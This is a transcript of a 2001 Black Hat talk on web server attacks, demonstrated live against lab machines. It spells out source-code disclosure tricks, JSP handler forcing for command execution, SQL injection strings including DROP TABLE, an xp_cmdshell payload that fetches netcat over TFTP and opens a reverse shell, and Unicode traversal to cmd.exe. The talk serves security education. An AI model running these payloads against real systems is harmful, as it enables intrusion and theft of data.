Welcome to Black Hat Windows 2K Security, held February 14th through the 15th, 2001 in Las Vegas, Nevada. The following videotape was recorded live at the conference and produced by the Sound of Knowledge Incorporated. This is videotape number 7, Technical Track, Web Hacking.
Thanks for the quick intro. Once again, we have a pretty complex demo setup over here, so just bear with us while we get difficulties sorted. As usual, managing 3 or 4 machines with NT running on them is no joke, and we're facing the same issues over here. So let me get quickly started with what we're going to talk about, and I'll run you through the setup once everything goes on. JD and I are going to talk about web attacks and what web attacks mean these days, and how devastating they can be, and how easy it is to pull off some of the attacks. So we'll take a quick look at those, the categories, the different types and such, and then we'll end with some fancy tools which JD has cooked up and give you some new demos. The latter part of the show, we're going to do it extempore, unrehearsed, so hopefully it all goes well.
Let me just get PowerPoint up.
Yeah, so we'll just quickly, as soon as Jeff gets the slides up.
Maybe tell what the machine is configured as? Or?
Yeah, we have that as a slide anyway. So.
Isn't that a reassuring sound? No.
So.
Yeah, you're going to hate me for this, but it's going to take me a while here.
Okay. Wow.
Come on.
Set,
Only trying to load up.
okay. Excellent.
Now I have to decrypt all my drives. Oh, God damn it.
If it locks you out, that's going to suck.
Son of a bitch.
Okay. Is Clinton around? Hey, JD, where'd
Oh,
Clinton
I
run?
don't know the exact value of this piece of paper, but it's at least worth 10 rounds of beers. So the first person, did you want to see your own password?
okay, yeah, one. Let me just do the other.
Anyway, it's up for auction.
Okay, anyway, let me just begin with sure.
Oh my God.
It's embarrassing, yes.
Can you hear me all? Okay, that's like really loud. I'd like to give Mr. Shah a proper introduction. This is Foundstone's top hacker. He currently holds the coolest, most sophisticated, most awesome hack any of us have ever seen. And it is true. It's very true. He's a very shy guy. But of all of our penetration testing, if we ever are having difficulty, this guy always gets in. He's also has a very cool trick for if you just have one hole through a firewall, HTTP, that's it. One hole, one way, HTTP, port 80 hole, into your network. Mr. Shah is in it and out. It's really incredible. He's going to talk about some of that later today. We're going to talk a little bit about that. This is really his show today. I'm just kind of here for the ride.
It's opening. think it was similar.
Yes.
Oh, there we go. Okay,
Right,
there
there
we
we go. Hooray.
Okay, with that, I give you Mr. Shah.
Thanks, Jeff, and everyone for putting up with this. I'll make it up to you guys. We've got cool wallet cards, hacking wallet cards. We'll pass it around to you for being such a nice and patient audience. So with this, let's get rolling. Let's quickly get into what is our target scenario? What is it that we are exactly attacking? We're going to be just talking quickly about the components of an e-commerce scenario and what goes into building up an e-commerce site. We have a web server, typically front end, the first server that all the client requests get sent to. Then we might have an application server separately, or we might have that component built into the web server. We may also have a database server in the back end holding a big data store. Of course, a firewall is there. Like no good e-commerce shop should go without a firewall. At least if you have hired consultants, that's what they'll tell you. Next slide, please. Then if there's a very high traffic site, you might have a load balancer, you might have reverse proxy systems, you might have cache systems sitting in between. But just go to the next slide. And this is how the whole thing looks like. There's a client in the front end, web client, which can be your web browser. All the traffic goes through HTTP port 80. Is that feedback? Is there a big feedback hum? Oh, okay, hang on. Anyway, so there's all the traffic gets sent through the firewall, hits the web server in the front end. I've just quoted some examples of popular servers over there. Then you might have web applications plugging in along with the databases. Here's how the whole thing looks like, just really quick. And now let me talk to you about traditional ways and means of hacking, that what we've been seeing so far. There's three basic categories of hacking. You hack a network service, you can hack the protocol itself, or you can hack a binary, which either interacts with a user session or a network session or otherwise. There's various complexities involved in traditional hacking. Like first you have to make sure network services are allowed through, you're allowed to connect through them. You know them well enough, you know you can walk your way through the binaries, you know assembly well, you can do shell code stuff, etc. There's lots of different architectures to deal with. It's a pretty complex activity. Next slide. Like you need to be able to zip through code like this and be able to tell what it does. A lot of you here might find it's normal, that's okay, but this is a special group over here. Next slide. So, but what are the limitations? Like we're hitting walls when we talk about traditional hacking. What is happening now is a lot of traditional attacks are now failing. Excellent, there we are. Okay, good. A lot of traditional attacks are now failing because either one of the three things is not allowed. The network protocol isn't allowed through, or the protocol itself is locked down. There's secure coding practices. A lot of vendors are learning from past mistakes. The question mark is somewhat ironic because some vendors don't learn. There is a lot of maturity in the software development life cycle when it comes to systems programming. And a lot of software houses are employing those these days. We're seeing tighter and tighter code come through. Next slide. So as you can see from the diagram, if you have a pretty strong firewall and a web-based architecture, most of the traditional attacks might be just blocked by a firewall. Like even if the server is vulnerable to attacks, like maybe RPC attacks or NT attacks, the traffic is just not allowed through. So you get a dead end over there. Next slide. Sometimes the holes might lie in the back end, which might be pretty much exposed, but we might not be able to get to those either because they're non-routable. They might be off on a separate private network inside a DMZ or something. So that again is stopped. Next slide. So when we talk about web hacking, here's how we started thinking about the whole thing. Like, let's assume all these doors are closed and you only have port 80 or port 443 or in short, you only have HTTP to go through, then what is it that we can do? For an e-commerce site, it's a must that HTTP should be allowed through. Otherwise, well, people can't get to your web servers. So no matter what kind of firewalls you put, you'll always allow web traffic through. So you always have a way in. And these days, because web architectures are so complex, you have so many things plugging into one another and components fitting in. You have virtual servers sitting in between and forking off different parts to different components. It is possible to target back-end interfaces, back-end components of systems through an HTTP request. Like you can straight away talk to a database component, or you can straight away talk to an application level component, all through HTTP requests. And because of all these complexities, there are very many possibilities of holes showing up. We'll show you how they happen. A lot of people still think HTTP is friendly traffic. Like if I just pose the question, what's safer, an open port 135 on an NT system or an open port 80 on an NT system? Like, can you really tell? No, maybe not. It all depends on what's behind the port. So, but contrary, like people will just think, okay, 135 is bad, 80 is okay. You know, that's no longer true these days. Next slide. And what does a web hacker need? Like, all you need is three things. Highest priority is this one. You need a clear mind, an internet connection, and a web browser. And some more tools we might need. Next slide. Well, okay, let me talk about this. Let me talk a little bit about the types of web hacks. Like, what are the different areas in an e-commerce rollout that you can target? You can hit the web server configuration, like take advantages of misconfigured web servers. Different mappings might be misconfigured and such. Next slide. You can try to blow up applications by feeding them bad input or input that they don't expect. You can take advantage of input validation attacks. Next slide. You can try to poison SQL queries. Pretty much all applications these days driven by databases have some sort of a SQL interface. They capture some input from the user side and pass it off as a SQL query to do some lookups. If you can figure out, if you can think how these queries are being made and see some problems with those, you can force meta characters and such, extending SQL statements. Next slide. And you can also play with HTTP sessions. Like HTTP was essentially designed to be a stateless protocol. Like there's a request, reply, and it ends. And session tracking was never built into the first versions of HTTP. And it's always been added on as an afterthought, and things have been patched ever since. So people have very many methods. You have hidden fields or cookies or session variables. You can try to play with those and see if you can steal other people's sessions. So that's another type of a web hack. Next slide. And web hacks typically cause three kinds of effects. You might have extra information being disclosed, like if you give a URL that is too long or play with some input fields. You might get an error message, and with the error message you might get information like physical path of the web route, or you might get some server configuration notes being leaked out to you. The second type of leakage you get is source code disclosure or arbitrary file content disclosure. Like we are able to pull out unparsed content of the logic behind the web applications, or even worse, we can walk through the whole file system on the web server and pull out arbitrary files. There's lots of examples of those hacks. And the third, the most juicy one, is being able to execute arbitrary commands on a target web system. So we'll quickly zip through some examples of these, especially on the NT 2000 platform. We'll also talk to you some about Java application hacking. That's becoming a popular application platform these days. Next slide. So what do you need in addition to the clear mind, the connection, and the browser? You might need a port scanner just to check what ports are open on a target web server. You'd need Netcat. Like, how many of you have heard of Netcat? I'd expect to see everyone raise their hands, but okay, it's okay. Netcat is a wonderful little utility, command line TCP UDP client, TCP listener, Swiss Army knife of network utilities. can redirect standard input, standard output through it. So it's pretty versatile. You might need a vulnerability checker just for web checks, like quick low-hanging fruit for web vulnerabilities. There's a program called Whisker by Rainforest Puppy. It's a pretty good one. If you're trying to hack over SSL connections, you would need OpenSSL, which is an SSL-enabled client or a listener. Actually, OpenSSL is a suite of utilities and programming libraries. It has an OpenSSL binary which can act as a client or a listener. Next slide. Well, just to quickly run through the steps that a web hacker might take. First few steps are try to port scan target systems to see what ports get returned as open. In this case, we don't need to port scan a whole range. We're just interested in a few well-known web ports, like 80, 81 is common, 443. Then all the other high-numbered web ports, you might have 8000, 8080, 7001, 7002, etc. Next slide. And once you're done with the port scanning, you pretty much go and take a look at all the open ports to see what kind of a web server you might have. Now you can use netcat to do that and send a head directive, and the web server might return you the HTTP headers. Let's just quickly do a demo to make sure everything's working. So here it's okay. I'll flip through the slides. Don't worry about it. This guy. You want the dual display on? Oh. Okay, there we are. Just go to the DOS prompt on the top. Oops. Yeah. Okay, I'm just going to do a quick request. I'm going to do a netcat. Is this readable? Like, oh, it's hard. Doesn't get any bigger than this. So let me try to see if I can get a bigger font going for you. Oh, this is worse. Oh well. Anyway, I'm going to try to target the system 10.0.0.10 on port 80 and do quick head/http 1.0. Well, it returns us with a response, says HTTP 1.1. It gives an error. Maybe the access was forbidden because this type of request or the resource might be denied. But what we get, the information we get is, it says server is Microsoft IIS 5.0. I mean, this may not be conclusive. People can play with this string, but for the most part, we'll be able to find out what kind of server it is. We can even do a quick operating system fingerprint and determine that. So that's pretty much the first step that you need to do for identifying servers. Next slide. Next is, if you find a server, you might want to run a quick check for low-hanging fruit and see if there's anything directly vulnerable. You might run Whisker. It gives you a quick dump of all known bugs, if there are any. We're not going to run that right now, so we'll be cool with it. Next slide. If it's all going over SSL, we can do OpenSSL. I'm just going to do a quick OpenSSL here. It is user local SL bin OpenSSL s_client minus connect 10.0.0.10.443. Once I do this, OpenSSL tries to connect to the SSL site. You can see the whole key and certificate exchange over here. And now we can give commands. You can say head/http 1.0, just like we would in netcat, and we get a response back. So don't assume that SSL is a be-all and end-all panacea for securing websites. SSL only secures the traffic in transit between the web browser and the web server. It does not secure anything else. So people who say that, well, our site is protected because we use SSL or VeriSign certificates or strong or weak or whatever crypto, that's entirely useless. In fact, with SSL, if you hack over SSL, you'll defeat intrusion detection systems. So your attacks will go encrypted, secure, undetected. So that's the other flip side of SSL. It gives people a false sense of security. I've seen that in practice. Like people say, you won't be able to break through because it's SSL. Too bad. Yeah. We can also come up with a quick 3-command version of an SSL proxy using netcat and OpenSSL coupled together in a shell script. And if we want to run fancy attacks, we can use a intermediate system which acts as an SSL proxy, receives all requests on port 80 in clear HTTP, and sends everything over SSL. So if you want to run a quick vulnerability check over SSL or want to run an exploit over SSL, that's possible too. Next slide. Okay, so to give you a quick overview of our targets, we have 3 systems over here. We have 1 and 2 systems on this one. It's running VMware, and my vision is okay. It's not, I'm not seeing double. And we have another system over here. One of them is running Win 2000 and IIS 5.0. The other 2 ones are NT4, IIS, one with SQL Server, and one is running Sun Java web server. So these are our targets. We're going to walk you through these when we attack the different systems. Next slide. Okay, so we come into the first category of attacks, source code disclosure. Here's a guy called Shah, who is my partner in crime at Foundstone. He is a maniac when it comes to hacking up Java application servers. His speed is like 2 vulnerabilities per week sometimes when he gets going really fast. Just breaks them apart. And he discovered an interesting bug in WebLogic and WebSphere, which we call the uppercase JSP bug. JSP is Java server pages, which is embedded Java tags within HTML pages on a Java platform. So when the page is served up, the Java code is compiled, executed, and the results are embedded in the HTML page, pretty much like server-side includes or active server pages. What Sriraj discovered is using uppercase JSP as an extension when requesting resources from WebLogic or WebSphere running on Windows NT, he was able to retrieve JSP and JHTML files without them being parsed. We could get the whole source code. Now, looking into it, he discovered why, and I'll walk you through the reasons. Here's just a quick screen cap. On the left-hand side, you see the normal page appearing. The URL, it's in your slide, so you'll be able to read the URL. It's called jdbctable.jsp. And if you give the same request in uppercase JSP, you get the source code displayed in the browser window. Now, how did this happen? Like, initially, Sriraj found this by accident because he left the caps lock key on. That's true, that's a fact. And this was before he was working with Foundstone. He happens to be one of my best friends. I've known him for years. And we got analyzing this bug.
I have to tell you the story. I love Sriraj. He's the sweetest guy. And when he first came, he only knew one word, okay. He would say, sure, let's go to lunch. He'd go, okay. Sriraj, I need to exploit. Okay. It was great.
Yeah. Right now, he's enjoying his honeymoon in the Coconut Lagoon in India, so he couldn't be with us. But yeah, this was when he was working in New York. He kept caps lock on, found this bug. Yes, your question. No. His question is, does this work if it's running on Solaris? Straight answer, no. Explanation comes in the next slide. Okay. No, hit back. Dude. Okay. Next one. Today? Okay. Next slide. That's fine. That's fine. Okay. I'm sure. Okay. Dude.
All right.
I mean, you got to love JD. He's a good friend. Okay, so here's a long and short of the whole bug. I'll skip through the story of the whole analysis. But looking at the configuration file of WebLogic, here are the configuration directives. If you see, there's different kind of resources being handled by different kind of handlers. Like for an HTML, you have something called the file servlet that serves out the page. For SHTML, you have an SSI servlet or a server-side include servlet. For JSP, you have JSP servlet, which processes these pages. So, well, what happened is when you give the URL index with uppercase JSP, it fails to match any of these configuration directives. Like says JSP uppercase is not JSP lowercase, so it just falls through and hits the default directive. So the default handler is nothing but return everything unparsed. Now when the operating system gets a request to open up index.uppercase JSP, that's where Windows comes in. Because Windows can't tell the difference between uppercase and lowercase when it comes to file names. So Windows will happily retrieve the file, uppercase or lowercase, and return you all the output. On Unix or Solaris, you'll get a 404 not found because index.uppercase JSP doesn't exist. So that was the long and short of this bug. Well, the analysis took us almost a couple of days to figure out why this happened over the phone. And he liked it so much, he decided to quit his job and get into the security business. He's written 15 other advisories since, so he pretty much fell into his comfort level with this thing. Next slide. Now here are some more tricks for source code disclosure on different application platforms, all courtesy Sriraj. He came up with all these. So I'm going to just go and give you a quick demo of these. Let me fire up a browser. On our systems, we have WebLogic and Java web server running, so we'll show you a quick example of these. That's fine. So here's the browser. Let me first go over to 10.0.0.12, port 7001. That's where we have WebLogic running. It's bringing back the page. Yeah, it's WebLogic application server. Over here, I have a file called hello_wl.jsp. I'm going to just pull up that file, hello_wl.jsp. It's a simple Java server page which has a few print statements in it. Just says, hello world, welcome to Black Hat W2K. Now, if I prefix the URL with the word file, so I say http 10.0.0.12/file/hello_wl.jsp, it's going to return me the source code without it being parsed. That's because this request gets handled by the default file servlet. If I prefix this with, let's say, star.shtml, it will get handled by the SSI servlet, which doesn't understand JSP tags, so it's going to return output like this. If we do a view source, we have the whole JSP code in here. Now, what's the significance of a source code disclosure? Like why is it quite a killer bug? Because sometimes not only can you retrieve all your business logic or critical application logic using this method, but if programs have built-in connection information or passwords or other sensitive logic like proprietary algorithms for maybe random number generation or session variable generation, or you might have some crypto stuff in there, you'll be able to retrieve all that stuff and figure out what's going on. So that was a quick look at source code disclosure on WebLogic. Next slide. If I'm going too fast or if you don't understand what the hell I'm talking about, please feel free to interrupt me like you are doing, sir. Yes?
Just one other question regarding, I guess, the previous slide.
Yeah.
Extended capital JSP is bug specific to Windows
Yes. The question is, the uppercase JSP bug was specific only to Windows NT, the application server running on Windows NT, and his question is, are these bugs, in the previous slide, just skip up by one, yeah, are these bugs also sensitive to the fact that it's on Windows NT? No, this is purely a bug arising because of improper URL parsing and improper configuration file directives. Any operating system, Solaris, AIX, NT, Linux, will fall prey to this. This is especially an application server bug. We've seen these are most popular Java web servers, Java application servers, and the way they're designed, like the same flaw can be found in most Java application servers. Like another, one slide back, please. Another example of source code disclosure is the famous plus.htr bug, which came out. The last time Black Hat was held, last July. I remember it. I was sitting in that other room happily playing with this thing. This bug causes source code disclosure for ASP or ASA files as long as it does not encounter a percentage character. This is a little quirky, but especially if you target it against global.asa, you might get contents of it. Because global.asa sometimes has directives written with script run at equal to server instead of the percentage tags. We'll do a quick demo of that. Excuse me. So on 10.00.12, first I try to look for global.asa as it is, and it'll say request for global.asa not allowed. Fine. We put a plus.htr at the end, and apparently we get nothing on our screen. But if we do a source display, view source, we have the entire contents of the ASA file in here. Also, we can have information like DSNs embedded in here, which is global to all applications. We have passwords. Like getting this gives us a huge treasure of backend information with us. Hang on, let me reposition this mic. How does this thing work? On URLs, the plus character means a space. You signify space with either %20 or the plus sign. That's okay, don't worry. So what happens is the URL translates to be HTTP IP address global.asa space .htr. And the way IIS parses the URL, it looks at the last extension, it's what, HTR. But when it tries to find the file, it only takes stuff up to the first space and ends there. And HTR requests are parsed by ISM, the Internet Service Manager, and that does not know how to interpret ASA files, so it just throws the source code in the raw. Next slide. Other methods and means of source code disclosures can be poorly written applications themselves, like applications which are sort of based on a driver template, which pull out different files to read and then display formatted content within them. Like you see all these news sites like CNET or Yahoo News. They'll always have a standard looking template with a ad at the top, a sidebar and everything, and the stories in the middle. Like those won't be all HTML files, all static HTML files. It'll be a central template script is pulling out content from somewhere else and just formatting it and showing it. Well, if the script is not written well, you can aim the script at any arbitrary file and pull out its content, and it'll show you in a nice formatted manner. On IIS 4.0, there's these files which get installed with examples like showcode.asp and codebrowse.asp. These are meant to pretty print source code for the sample sites that IIS came with, so that developers can follow. Well, they don't do proper file checking, file path checking, so people can actually jump the web root. Next slide. You can actually use showcode.asp like this. You say source is equal to /macdc /... jump out of the web root, enter into any path and pull out any file name. Next slide. Like over here, I am pulling out a file called upload.asp, which is in my web root, and seeing all the source code, which shouldn't be shown. Next slide. So this was a little bit quick introduction about source code disclosure attacks. I mean, by no means is this whole rendering complete. There's so many other ways and means, but we want to leave those and proceed on to some more interesting things. So the next category of attacks we found is attacks which hit the web server architecture, like the way in which a web server is implemented or configured, or the way all the components fit together. There are some holes where you can bypass the way components interact and choose your own paths into components. I'll explain better with a diagram in the next slide. Here's how web servers are made of. Typically, you have a front-end process which handles requests, and you have handlers or components for handlers within the web server code. So different types of resources get passed with different handlers. For HTML, you have a handler which throws the text HTML header. Let's say for CGIs, you have a handler which actually forks off a bin shell or Perl or whatever CGI interpreter is used, runs the code, throws the header and sends the output back. For JSP, Java Server Pages, actually the code gets fired off to a Java compiler, compiles it into a class file, fires off the class file to the Java runtime, executes it, and sends the output on its way back. So, and there is a central configuration or logic lying in the main process which directs which handler should pick up which kind of resource. Well, if you try to attack the architecture, you can mix up the handlers. You can force any kind of handler onto any kind of resource. And this we've seen is a common case with a lot of Java application servers. Sriraj was instrumental in finding these out as well. Next slide. So what we're trying to do is trying to force handlers which are not meant for the resource and actually see what results do we get. So let us say if we have a CGI file which is supposed to be interpreted, and we actually force the default handler on the CGI file, what's going to happen? The CGI won't get interpreted. Instead, all the source code will be thrown out in an unparsed manner and code delivered back to your browser. So that would cause a source code disclosure bug, which I'll just do a quick demo. Okay, here we are. I have on 10.11.12 on port 8080, I have Sun Java web server running. And there's another file I have called hello.jws.jsp. Similar kind of a file. It says, welcome to Black Hat's demos running on Java web server. Now, if I want to cause a source code disclosure with this, I can forcibly invoke the file servlet to process this JSP file. And the way I do it is I prefix the URL with servlet. And then I go into the path of the Java archive file. So I go com.sun.server.http.servlet servlet.file servlet. Oh well, it has completed the tag. So you actually go into the Java archive, pick out whatever servlet you want and force it onto a kind of a resource. So over here, if I force this servlet on hello.jws.jsp, it's going to ask me to save the file because it doesn't have the MIME types. I'll just say save file. I'll save it as temp.jsp. Save. Let's see if it did save it. So temp.jsp. Yes, it is there. And if I say type temp.jsp, here's the content of the file. So here's an example of a handler forcing causing source code disclosure. Now, what if we think of the other way around? What if we force a Java handler on a non-Java file? What's that going to do? Next slide. So we're trying to force a JSP handler onto a plain HTML file. Now, what would that do? that will cause the HTML file to be actually compiled. Now, whether it makes sense or not is not for us to see. But the Java compiler is going to try to compile the HTML file, see if it generates any bytecode and run it. What this means is if we are able to send input to an HTML file, like from remote, from an application or from a web interface, then we can actually use such kinds of handler forcing to get that HTML and embedded Java code compiled and executed. Next slide. Again, we use the /servlet prefix on Sun Java web server. We have a page compile servlet, which compiles and runs Java server pages. We'll try and force that in. Next slide. And here's the whole syntax. You use /servlet /com.sun.server.http.pagecompile.jsp.runtime.jsp servlet, the whole thing, and force it onto any file that lies within your web application root. A classic case where you can do this is applications like a guest book or a bulletin board that take inputs from a user and post it into an HTML file so that everybody can see. A lot of internet applications would do that. A lot of applications that store temporary data would also do this. Like if your data is stored in transit in temp files, and if you're able to figure out where these temp files are, you can force a handler and get them compiled, and this will cause arbitrary code execution. Next slide. So here's how the whole concept looks like. You have an HTML file. Instead of it getting passed by the HTML handler, you ask the Java compiler to look at it by forcing the handler, get it executed and sent back. I'll give you a quick little demo. Skip to the next slide. In Sun Java web server, it comes pre-configured with a bulletin board sample. So I'm going to open up a Java web server over here, 8080. So here's the main page of Java web server. Let's look at the sample applications. Go to applications. It has a bulletin board. And here's what the bulletin board does. Anything that you type in the bulletin board will get posted for everyone to see. Let's go to the next slide. And here's the comments that I want to post in the bulletin board. A long set of JSP code. What it does is it creates a runtime process and gives the exec method to it. And in the exec method, you type the command that you want the shell to execute. It creates a little buffered reader which reads and writes the input-output streams. And there's a little clause that catches an exception, if any. And it just prints the input-output stream back to you. So if we inject this JSP code into the HTML file and get it compiled, we've got remote command execution. So I'm going to do just that. I have all the code with me. I'm going to just cut and paste it out of this file. And paste the whole thing over here. And the command I'm going to run is just a simple directory command, cmd/dir. I'm going to post this. So you say post to the board. Okay, the postings appear over here. And now let us look at just the file board.html. We're just going to reference the file to see if it made it there. Yes, it did. And now we'll force compile the whole thing. So we'll go servlet. Okay, I have it over here already. Servlet /com.sun.server.http page compile JSP runtime JSP servlet and aim it to board.html. Hit enter. It compiled it, it ran the directory command, gives you all the output in the browser. So it's not pretty formatted, but imagine if you use, you just open up a back connection to yourself or something. That's, that way you've got a command prompt in almost no time. Java web server on NT runs as system service or administrator level service if it's installed default. So you already have system or administrator privileges. On Sun, on Solaris, people install it and run it as root. And guess what? You get root shells out of this one. So this is a pretty neat trick. There's a lot of Java application servers which have an upload servlet or a post servlet. There's one called servlet exec from Unify that does this. WebLogic has something like this. All these fall prey to such attacks. Next slide. Here's a code on the Unix. If it was running on Unix without Xterms, what I can, this string would launch me a reverse telnet connection. Yes?
I would assume you can try this stuff against, IS5 too, and also what are you finding in terms of this hammer force?
Beg your pardon? If I try this against IS5,
Yeah. Are you finding this kind of behavior where you're able to force the hammers and similar types?
okay, your question is, can I try to force, have I found that I am able to force handlers on IS5 or something like that? Not directly, no, but if we go back to that global.asa bug, the plus HTR, that is kind of an indirect way of forcing a handler. The only catch is for IIS, I don't know how the components are laid out, or it's difficult because it's closed source. It's hard to find out what are the right DLLs and how do they get invoked with various means. For Java application servers, it was pretty easy because you have the whole Java archive and you pass the code through a Java decompiler, like bam, it gives you the code with pretty much the variables obfuscated, but you get it pretty easily. So no, the answer is not yet on IS5 or IS4. I personally, or we from Foundstone, haven't been able to find any. So that's like the best I can probably think of. Next slide. So that brings us to another category of attacks. Quick look at SQL query poisoning. And I mean, these attacks are pretty trivial. It's no rocket science to pull these attacks off. But in the industry, this kind of vulnerability is very rampant. And I'll explain why. Over here, you have I have a source code of an ASP page. What it does, it tries to take input from the query string that is sent to the ASP page with some parameters, takes the parameters, over here the parameter is called ID, and it puts the parameter right into the SQL query string. So it says select star from product where ID is equal to something concatenated with whatever ID parameter is on the query string. Now this is very weak programming. Why? Is because you don't know what is coming in this ID string. It might be a genuine ID or it might be an extended string. So let's see what happens. Stay on this slide. I'll pop open a quick demo over here. So I have HTTP 10.0.0.11 and webstore.html. Over here I have a quick mock-up of an online art gallery which sells paintings on the web that you can browse through and such. So let me pick out this one, Golden Sunset. If I click on this, it will give me details of the picture. Hello, there it is. Okay, so here's an ASP file. Over here it's called showtable.asp, and on the URL it is showtable.asp question mark ID is equal to 2 and pic is equal to Tahoe 1. So from looking at the URL, we can guess that some sort of a query is being made to the backend to retrieve item number 2, product ID is 2, and show the picture as Tahoe 1. So if we just play with these parameters, we'd be able to get some different things. Let me just change it to ID is equal to 3. If I say ID is equal to 3, it gives me a different stock number and different product details. Now instead of 3, I can extend this. Just go to the next slide. Instead of just ID is equal to 3, I can try give a URL like this. Say ID is equal to 3 plus or plus 1 is equal to 1. What this would mean is, since this whole string gets copied in the SQL query, your resultant query is select star from product where ID is equal to 3 or 1 is equal to 1. Now 1 is equal to 1 is always true, so this will return all rows of the database. So if your online store or online bank or whatever it is using this thing, you'd be able to dump all the rows or all the accounts or whatever sensitive information you have in the database. And I don't need command line privileges to pull data out. I'll just use the faulty programming in there. It can go a step even better. Next slide. Like, who says I want to do retrieve all rows? I just drop the table. So off it goes. Now, why would this work? Like, if a smart person programs it, a drop table won't work because the database is not supposed to run as system administrator. But these days, you have a whole set of programmers. What shall I say? This whole zero knowledge administration, zero knowledge point and click programming has brought about zero knowledge administrators and zero knowledge programmers who don't know what the hell they're doing. So all those guys burn. Sorry for being melodramatic, but this is true. People want to take their legacy business, put it on the web because what everybody else is doing it. All the financial houses in Wall Street, they all want to get on the web. They don't have any expertise because they've been dealing with money, not machine code. So they hire third-party agencies to temporarily bring on consultants or developers for hire. They sit in there for 6 months, cook up some code, go away, and bam, their company is on the web. How did they come up with the code? They were just looking at teach yourself ASP in 21 days or teach yourself SQL Server in 30 minutes. These books come with CDs or with companion websites. So guess what? I don't even have to type the code. I'll steal it right from there. The books come with lame examples. I mean, the books are not supposed to come with secure coding examples because why bother the authors? Leave them alone. So they just cut and paste the examples, change the names, change the formatting, and their application works. Their manager at the company says, okay, fine, it's all working. Nobody tested it. They made their deadlines. They go off, do another job. This code is lying. Whose responsibility is? Like, they came, developed it, they went away. The manager is in custody of the code. She doesn't know what to do with that code. It's just going to be there. I mean, it's going to be backed up forever, but it's going to be there. And such sloppy programming sneaks in. I mean, just go on the web and see so many sites will fall prey to these kind of errors. You'll be able to just mingle around parameters and SQL queries, and you'll end up with so much information, it's shameful. So, and this is sloppy programming. This is nobody else's fault. And they'll leave the database connected as SA, system administrator, and sometimes it's even with a blank password, which is like, who's going to connect to it from the web? So let's keep a blank password. So, oh well. SA means I don't have to make sure that this application has this privilege or this database has that privilege. They'll just, everything works, everything is accessible. And since you have SA privileges, you can do tricks like this. Instead of drop table, I'll go exec master.xp underscore command shell is a stored procedure in SQL Server, which is not available to anyone but SA, but our genius programmers left it there, left it running as SA. And then I give any command, any shell command that I want. In this case, I'm doing TFTP from a separate machine. So the server goes out, TFTPs out to a server, downloads netcat, and fires up a command shell back to me. Next slide. So here's how the whole thing is going to work. I'm going to give you a quick demo of this. Is from the browser, you poison the SQL query, causes IIS and SQL Server to go out to a TFTP server, download netcat, and fire back the command prompt on my listener. So let me just quickly do that, and I hope it works. So over here, I have my listener on port 2001. And over here, instead of ID is equal to 3 or 1 is equal to 1, I do ID is equal to 3, %01, exec plus master .xp underscore cmd shell plus, all these plus signs are spaces. So tftp minus I 10.0.0.3, that's where my TFTP server is. Get netcat.exe. I give percentage 26, that's the ampersand sign. Netcat minus e cmd.exe. My IP address is 10.0.0.1. My port is 2001. I hope I haven't made an error in typing. So with this, it's working. And over here, you notice this thing came back to us. It downloaded Netcat, gave us the prompt, so I can do whatever I want on this server. It's owned through the web because of that stupid programmer's fault. Well, in this case, I won't call the programmer stupid because I wrote this one. But, just show the IP address is 10.0.0.11. And this is how you can own SQL servers of the web. So that's a quick demo for SQL queries. Next slide. Let's revisit the classic MDAC attack. I mean, this has been chewed over and over again, but still, every time I run it, I mean, I feel thrilled. It's such a neat, elegant little thing. Hang on, let me see how I'm doing for time. We have lots of time. Okay. We have time, don't we? Yeah. Okay, cool. Thank you. Yeah, let's quickly talk about the MDAC attack. It's written by, the bug was discovered by RFP. And what MDAC does is it allows, in a nutshell, it allows remote users to perform SQL queries without being authenticated. You make direct queries to msadcs.dll with the VB-BUS server object. I forget, I'm not an NT hacker, so I don't know the details very well. But what we need to know is we need to know the DSN, and we need to see if msadcs.dll is actually present and it executes, and it's the vulnerable version. And the script, the exploit script, performs SQL queries which pipe things to a shell. Next slide. So here's some excerpts from the exploit script. It does a select star from customers where city is equal to something, pipe it with shell, and give your own command over here. And it targets a lot of default DSNs that come installed by default, or they might be present there. If this thing executes, you gain administrator privileges on NT system privileges. So I'm going to quickly run that attack for you. Let's go to the next slide. We're going to do the same thing. We're going to give a command which causes the IIS server to go out TFTP netcat and throw it back at us really quick. So I'm going to open up a listener over here on port 2001. I'm going to go to my Unix system, exploits, MDAC, and I have a pre-configured script which takes in command line parameters. So I have MDAC hack vnc.pl, give host IP is 10.0.0.12, my IP is 10.0.0.1, my listener port is 2001, and my TFTP server is 10.0.0.3. So I hit this, and let me move this on the side so we'll see. It's going targeting the NT server. It says success, comes back to us, and what happened? Okay. Well,
You never disconnected your first window.
no, I did. I did the exit. So, okay, let me just make sure it's not. Let me just make sure it's all okay. Very interesting.
Command line there shows that netcat tried to connect to 10.0.0.1.
Yeah, and my IP address, my IP over here is 10.0.0.1. The .11 was the other SQL Server guy. let me see, just quick one. The problem is demos don't scale, exploits don't scale, especially not when you're trying to run them when the whole world is watching. So let me run it again. Let's see. My command line minus host minus port. I think I forgot minus I. My IP address is. Let me just type it again. MDAC Hack VNC minus host 10.0.0.12 minus I 10.0.0.1 minus P 2001 minus T 10.0.0.3. Okay, here we go. Says success. Oops, I didn't have the listener up this time. Sorry. Once again. Ran. It doesn't seem to be working. Oh, well, failed demo. Sorry about that. This, beg your pardon? Somebody asked something. Maybe somebody patched it on the side. Oh well. Let's excuse the guy for once. Okay. Anyway, so you understand how this will work. I'm not going to go to this demo. We'll skip it for now. And now we're coming to the best part. The last few parts where we're going to go unrehearsed and show you new tricks. We're going to talk about the Unicode bug. I'm sure everybody's heard of this bug. It causes remote command execution on IIS web servers under the context of a user, which is pretty much nobody or guest equivalent on NT. And if we pull off some neat little tricks that we're going to show, it can lead to potential administrator level access compromise. Next slide. So the exploit string is like this. We have an IP address. We take a virtual root, a virtual directory on a web server which has script execution privileges. That's very essential. And from there, we do a ... and a percentage C0 or AF. C0 AF is an illegal Unicode sequence which stands for the slash character. So we had a effectively we've done a ... /.. gone into winnt system32 cmd.exe. It will execute because this directory has execute privileges, and then give a question mark /c any command that we want. The essential thing is this virtual directory should lie in the same volume as the system root, otherwise you can't span volumes. You should be able to find your way to cmd.exe somehow. So I'm going to give you a quick demo of this. Over here we have two systems. Just go to the next slide. We have two systems, 10.0.0.10 and 10.0.0.12. 10.0.0.10 is running 2000, 10.0.0.12 is running NT4. We will show admin level compromise on both. So first let's get the NT4 guy. It's the easier of the two. So here's the NT4 web page, and let me go to scripts, .c0af, .winnt system32 cmd.exe, and over here I can give any command I want. Let me give the set command just to be really sure. So over here the set command actually worked and all the output got dumped in the browser window. Set just shows you all the environment variables on there. You can do commands like cd to print the current directory, or you can do version, ver, you can do dir, whatever you feel like. This is NT40. And now what we are going to do, this next 